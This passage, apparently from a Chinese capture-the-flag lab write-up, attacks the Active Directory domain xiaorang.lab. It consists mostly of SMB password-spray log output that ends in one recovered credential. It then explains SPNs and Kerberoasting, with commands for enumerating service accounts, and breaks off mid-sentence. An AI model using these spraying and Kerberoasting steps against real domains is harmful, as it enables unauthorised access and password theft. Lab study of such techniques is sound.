SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\chenjie:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\chenjie:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\chenjie:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\chenjie:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\yangyong:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\yangyong:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\yangyong:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\yangyong:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lipeng:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lipeng:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lipeng:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lipeng:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lixin:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lixin:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lixin:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lixin:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liukai:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liukai:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liukai:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liukai:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\machao:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\machao:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\machao:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\machao:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lijia:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lijia:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lijia:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lijia:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangping:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangping:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangping:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangping:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhanghui:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhanghui:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhanghui:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangwen:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangwen:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangwen:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangwen:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangmin:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangmin:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangmin:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangmin:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\chenlin:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\chenlin:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\chenlin:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\chenjuan:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\chenjuan:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\chenjuan:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lining:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lining:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lining:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lining:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangwei:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangwei:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangwei:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangwei:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangnan:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangnan:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangnan:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangnan:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangxia:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangxia:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangxia:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangxia:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangyu:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangyu:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangyu:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangyu:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\chenchen:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\chenchen:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\chenchen:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\chenchen:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangbing:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangbing:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangbing:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangbing:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lilin:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lilin:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lilin:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangling:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangling:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangling:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\chenling:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\chenling:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\chenling:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\yangmei:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\yangmei:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\yangmei:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\yangmei:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liuqiang:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liuqiang:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liuqiang:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lihong:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lihong:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lihong:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lilei:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lilei:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wanghuan:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wanghuan:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wanghuan:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wanghuan:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangxin:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangxin:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangxin:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangxin:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\yangping:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\yangping:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\yangping:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\yangping:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lijie:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lijie:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lijie:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\lijie:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangqian:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangqian:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangqian:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangqian:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liping:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liping:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liping:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liping:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liuhui:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liuhui:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liuhui:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liuhui:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangming:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangming:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangming:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangming:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangying:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangying:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangying:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangying:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\libo:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\libo:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\libo:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liuqin:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liuqin:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liuqin:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liuqin:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangchao:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangchao:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangchao:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangchao:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liuli:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liuli:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liuli:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liuli:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\yangwei:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\yangwei:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\yangwei:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangyan:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangyan:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangyan:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangyan:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangjian:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangjian:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangbin:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangbin:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangbin:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangli:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangli:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangdan:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangdan:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangdan:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangdan:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liuxia:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liuxia:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liuxia:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liuxia:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangrui:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangrui:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangrui:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangrui:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangdong:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangdong:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangdong:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangdong:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangting:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangting:i9XDE02pLVf STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangting:6N70jt2K9sV STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangting:fiAzGwEMgTY STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangjian:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [+] xiaorang.lab\zhangjian:i9XDE02pLVf
zhangjian:i9XDE02pLVf在flag2的提示中有一个spn,所以先查一下有没有域用户的spn,就是一个可以找到域用户服务的唯一标识一个服务实例的“标签”
什么是 SPN
🔹 SPN原理
SPN 是 AD 域里用来唯一标识一个服务实例的“标签”。
例如:一个 SQL Server 服务运行在
SQLSERVER01这台机器上,它的 SPN 可能是:MSSQLSvc/SQLSERVER01.xiaorang.lab:1433客户端在请求服务时,会根据 SPN 找到服务账号,然后使用 Kerberos 给这个账号发放票据。
🔹 为什么要查“域用户下的 SPN”
因为服务账号 ≠ 普通用户账号
在 AD 里,一些服务(SQL、IIS、Exchange、SharePoint 等)会使用域用户账号来跑服务。只要账号下绑定了 SPN,它就能代表该服务进行 Kerberos 身份验证。安全测试/运维中
如果一个域用户账号绑定了 SPN,就说明它是服务账号。
这类账号往往需要更高权限,或者至少长期存在,容易被攻击者盯上。
在渗透测试场景里,枚举出 SPN 后,常会用于 Kerberoasting 攻击(即向域控请求该 SPN 对应服务票据,然后离线破解密码)。
运维/审计意义
通过查 SPN 可以梳理域内哪些服务跑在什么账号下。
安全人员可据此发现是否有弱口令/高权限服务账号。
管理员可确认 SPN 是否配置正确,避免身份验证异常。
🔹 怎么查
如果是管理员,在域控或域成员上可以用:
setspn -T xiaorang.lab -Q */*或者用 AD 模块:
Get-ADUser -Filter {ServicePrincipalName -like "*"} -Properties ServicePrincipalName |
Select-Object SamAccountName, ServicePrincipalName这样会列出所有绑定 SPN 的域用户。
✅ “之前的提示里提到了 SPN(服务主体名称),那我们应该去查看域里各个用户账号是否绑定了 SPN,从而找出潜在的服务账号(高价值目标)。”
什么是Kerberoasting ?
Kerberoasting 这个词来自于 Windows Active Directory/Kerberos 的攻击面,是域渗透里非常常见的一种技术。我帮你用白帽子的角度解释一下:
🔹 原理
SPN 与服务账号
在 AD 中,很多服务(例如 MSSQL、IIS、Exchange)会用一个域用户账号来运行。
这个账号会注册一个 SPN (Service Principal Name),这样 Kerberos 能把“某个服务请求”关联到“哪个账号”。
Kerberos 正常流程
客户端想访问服务 → 向域控请求服务票据 (TGS)。
域控根据 SPN 找到对应的账号,把票据用这个账号的 NTLM hash 加密后返回。
客户端再把票据交给服务端验证。
攻击者可以做的事
在域里,任何普通用户都能向域控请求任意已知 SPN 的服务票据。
得到的 TGS 里包含了用服务账号密码哈希加密的部分。
攻击者就可以把这个票据离线爆破,还原出服务账号的明文密码。
🔹 攻击价值
如果服务账号密码弱(如
Welcome123),就可能被暴力破解出来。这些服务账号常常:
